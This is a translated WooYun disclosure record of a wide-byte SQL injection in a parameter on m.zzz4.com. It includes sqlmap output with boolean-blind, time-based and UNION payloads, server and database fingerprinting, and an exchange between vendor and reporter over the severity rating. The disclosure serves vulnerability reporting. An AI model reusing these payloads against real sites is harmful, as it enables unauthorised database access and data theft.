
Vulnerability summary

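Bug ID: wooyun-2015-0159239

Title: SQL injection vulnerability in a Zhuzhou Online (株洲在线) site

Vendor: zzz4.com

Author: 深度安全实验室

Submitted: 2015-12-08 10:45

Fixed: 2016-01-21 18:22

Published: 2016-01-21 18:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]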


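Vulnerability details

Disclosure status:

2015-12-08: Details reported to the vendor; awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and experts in related fields
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public

Brief description:

Details: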

http://m.zzz4.com/pk/info.php?id=1

Wide-byte injection


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1' RLIKE (SELECT (CASE WHEN (2446=2446) THEN 1 ELSE 0x28 END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))njch)
Type: UNION query
Title: MySQL UNION query (NULL) - 20 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6e7450765967766c4b6f,0x716b707671),NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14
back-end DBMS: MySQL 5.0.12
Database: zx_db
[100 tables]


Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source, 深度安全实验室@WooYun


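Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2015-12-08 11:27

Vendor reply:

The vulnerability has been fixed. Thank you for testing.

Latest status:

None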


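Comments on this vulnerability:

Comments

  1. 2015-12-08 11:36 | 深度安全实验室 ( Core white hat | Rank:2695 Vulnerabilities:454 )

    Has the person handling this been replaced? The score given is so low.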